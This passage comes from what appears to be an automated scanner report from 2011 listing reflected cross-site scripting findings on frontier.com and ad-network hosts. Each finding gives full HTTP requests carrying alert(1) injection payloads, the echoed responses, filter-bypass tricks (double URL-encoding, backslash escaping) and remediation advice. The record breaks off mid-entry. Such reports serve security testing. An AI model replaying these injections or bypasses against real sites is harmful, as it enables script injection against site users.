GET /Images/2011promo611ec%2527%253balert%25281%2529%252f%252f635909959d4/bg-grey.jpg HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Images/2011promo611ec';alert(1)//635909959d4/bg-grey.jpg');//]]>
...[SNIP]...

2.36. http://frontier.com/Images/2011promo/bg-grey.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /Images/2011promo/bg-grey.jpg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cde47%2527%253balert%25281%2529%252f%252fcff2b560950 was submitted in the REST URL parameter 3. This input was echoed as cde47';alert(1)//cff2b560950 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Images/2011promo/bg-grey.jpgcde47%2527%253balert%25281%2529%252f%252fcff2b560950 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Images/2011promo/bg-grey.jpgcde47';alert(1)//cff2b560950');//]]>
...[SNIP]...

2.37. http://frontier.com/Images/2011promo/bg-grey.jpg [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /Images/2011promo/bg-grey.jpg

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de098'%3balert(1)//67697fc3289 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de098';alert(1)//67697fc3289 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Images/2011promo/bg-grey.jpg?de098'%3balert(1)//67697fc3289=1 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43733


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Images/2011promo/bg-grey.jpg?de098';alert(1)//67697fc3289=1');//]]>
...[SNIP]...

2.38. http://frontier.com/Shop/Login.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://frontier.com
Path:   /Shop/Login.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 866b2'%3b64e0a78ddc1 was submitted in the REST URL parameter 1. This input was echoed as 866b2';64e0a78ddc1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shop866b2'%3b64e0a78ddc1/Login.aspx HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43291


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?aspxerrorpath=/Shop866b2';64e0a78ddc1/Login.aspx');//]]>
...[SNIP]...

2.39. http://frontier.com/Shop/Login.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /Shop/Login.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb7ff%2527%253balert%25281%2529%252f%252f4743277aa69 was submitted in the REST URL parameter 2. This input was echoed as eb7ff';alert(1)//4743277aa69 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Shop/Login.aspxeb7ff%2527%253balert%25281%2529%252f%252f4743277aa69 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43573


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Shop/Login.aspxeb7ff';alert(1)//4743277aa69');//]]>
...[SNIP]...

2.40. http://frontier.com/winwin1 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /winwin1

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d97a2%2527%253balert%25281%2529%252f%252f5a9a39ab965 was submitted in the REST URL parameter 1. This input was echoed as d97a2';alert(1)//5a9a39ab965 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /winwin1d97a2%2527%253balert%25281%2529%252f%252f5a9a39ab965?mkwid=sPb9VHDZ0&pcrid=14742396110 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43781


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/winwin1d97a2';alert(1)//5a9a39ab965?mkwid=sPb9VHDZ0&pcrid=14742396110');//]]>
...[SNIP]...

2.41. http://frontier.com/winwin1 [mkwid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /winwin1

Issue detail

The value of the mkwid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cd51'%3balert(1)//f8a5646b3ab was submitted in the mkwid parameter. This input was echoed as 4cd51';alert(1)//f8a5646b3ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /winwin1?mkwid=sPb9VHDZ04cd51'%3balert(1)//f8a5646b3ab&pcrid=14742396110 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52186


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/VirtualPage.aspx?pageid=1018&origPath=/winwin1&mkwid=sPb9VHDZ04cd51';alert(1)//f8a5646b3ab&pcrid=14742396110');//]]>
...[SNIP]...

2.42. http://frontier.com/winwin1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /winwin1

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2473b'%3balert(1)//867912431c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2473b';alert(1)//867912431c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110&2473b'%3balert(1)//867912431c1=1 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52233


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/VirtualPage.aspx?pageid=1018&origPath=/winwin1&mkwid=sPb9VHDZ0&pcrid=14742396110&2473b';alert(1)//867912431c1=1');//]]>
...[SNIP]...

2.43. http://frontier.com/winwin1 [pcrid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /winwin1

Issue detail

The value of the pcrid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59505'%3balert(1)//f0a2d5e98b9 was submitted in the pcrid parameter. This input was echoed as 59505';alert(1)//f0a2d5e98b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /winwin1?mkwid=sPb9VHDZ0&pcrid=1474239611059505'%3balert(1)//f0a2d5e98b9 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52186


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/VirtualPage.aspx?pageid=1018&origPath=/winwin1&mkwid=sPb9VHDZ0&pcrid=1474239611059505';alert(1)//f0a2d5e98b9');//]]>
...[SNIP]...

2.44. http://games.frontier.com/WebAnalysis/APP/GenerateCode.ashx [lc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.frontier.com
Path:   /WebAnalysis/APP/GenerateCode.ashx

Issue detail

The value of the lc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 434e0\'%3balert(1)//c3ce629f4e0 was submitted in the lc parameter. This input was echoed as 434e0\\';alert(1)//c3ce629f4e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /WebAnalysis/APP/GenerateCode.ashx?pagefilename=game&code=119282623&lc=en434e0\'%3balert(1)//c3ce629f4e0&channel=110464377 HTTP/1.1
Host: games.frontier.com
Proxy-Connection: keep-alive
Referer: http://games.frontier.com/game.htm?code=119282623&lc=en&channel=110464377
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=oberonfrontier%3D%2526pid%253DhomePage%2526pidt%253D1%2526oid%253Dhttp%25253A//games.frontier.com/game.htm%25253Fcode%25253D119282623%252526lc%25253Den%252526channel%25253D110464377%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 3416
Cache-Control: private, max-age=14400
Date: Tue, 06 Sep 2011 12:50:58 GMT
Connection: close

try{var s_account='oberonfrontier';
var s=s_gi(s_account);
GameCatalog.WebAnalysis.SiteTracking.Replacer.symbols = {'%%tcp-disconnect-status%%' : function(){ return GameShell.GetTcpDisconnectStatus
...[SNIP]...
ents,eVar1,eVar2,prop1,eVar7,eVar11,eVar10,prop10,eVar6"; s.linkTrackEvents = "event1"; s.dc = 112; s.eVar10 = s_account; s.prop10 = s_account; s.campaign = '' ; s.prop1 = 'WebAnalysis' ; s.prop2 = 'en434e0\\';alert(1)//c3ce629f4e0' ; s.prop3 = '/WebAnalysis/APP/GenerateCode.ashx' ; GameCatalog.WebAnalysis.SiteTracking['game']= { 'pageName' : 'GamePage - [Mystery Age Imperial Staff]' , 'products' : ';Mystery Age Imperial Staff'
...[SNIP]...

2.45. http://ib.adnxs.com/seg [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c810'%3balert(1)//01b28dbf622 was submitted in the redir parameter. This input was echoed as 2c810';alert(1)//01b28dbf622 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /seg?add=155746&redir=${SEG_IDS}2c810'%3balert(1)//01b28dbf622&t=1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; sess=1; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 07-Sep-2011 12:46:31 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-18; path=/; expires=Mon, 05-Dec-2011 12:46:31 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0uQsu#'0AK.2BD)8JE^N(7nZs3ht</s2t.vO)!%C9MfYBDro4%$RXj*VXG`FnPjma[wF*_)<q[y1WP9e8pC8`#5O?0/><2+:3wu0usM@nf1dht<oQOZgDK+C#1JIHqN@hU=SVr%o_v%pV$Tn'!-5)NXI#wq; path=/; expires=Mon, 05-Dec-2011 12:46:31 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 12:46:31 GMT
Content-Length: 484

document.write('<img src="http://ad.doubleclick.net/activity;src=2055485;dcnet=4845;boom=52987;sz=1x1;ord=1?" width="1" height="1"/>');document.write('<img src="http://b.scorecardresearch.com/b?c1=8&c
...[SNIP]...
<scr'+'ipt type="text/javascript" src="${SEG_IDS}2c810';alert(1)//01b28dbf622">
...[SNIP]...

2.46. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3484/103250/GGGreen_Flash_300x250_LPC.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fa3a"%3balert(1)//ba80aca61be was submitted in the mpck parameter. This input was echoed as 5fa3a";alert(1)//ba80aca61be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/3484/103250/GGGreen_Flash_300x250_LPC.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3484-103250-2056-0%3Fmpt%3D21341037515fa3a"%3balert(1)//ba80aca61be&mpt=2134103751&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DB--PrVhhmTpXRMprmjQSu78WoAvWx35EClYfx3xq515WrPuCi5AEQARgBIKittBQ4AGDJ1vqGyKOgGbIBDnd3dy5teWZpdHYuY29tugEKMzAweDI1MF9hc8gBCdoBQWh0dHA6Ly93d3cubXlmaXR2LmNvbS9zZWFyY2g_cXVlcnk9WFMlRUYlQkYlQkRkYWNlO2FsZXJ0KDEpLy9iYWNruAIYwAIGyALr9M8M4AIA6gIKMjg0ODM1Njc5NZADrAKYA-ADqAMB0QOyxxpSLRKzBPUDAAgAxMgEAeAEAaAGEQ%2526num%253D1%2526sig%253DAOD64_3qs0lOVYYCU9__uy2v7b56S6k4_Q%2526client%253Dca-pub-2043876247497391%2526adurl%253D HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?query=XS%EF%BF%BDdace;alert(1)//back
Cookie: svid=319726075672; mojo3=3484:2056/17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:56:25 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 00:13:06 GMT
ETag: "3ecbcf-c0b-4870f8e26a880"
Accept-Ranges: bytes
Content-Length: 10066
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
0QOyxxpSLRKzBPUDAAgAxMgEAeAEAaAGEQ%26num%3D1%26sig%3DAOD64_3qs0lOVYYCU9__uy2v7b56S6k4_Q%26client%3Dca-pub-2043876247497391%26adurl%3Dhttp://altfarm.mediaplex.com/ad/ck/3484-103250-2056-0?mpt=21341037515fa3a";alert(1)//ba80aca61be\" target=\"_blank\">
...[SNIP]...

2.47. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3484/103250/GGGreen_Flash_300x250_LPC.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9293a"%3balert(1)//ef5b805385b was submitted in the mpvc parameter. This input was echoed as 9293a";alert(1)//ef5b805385b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

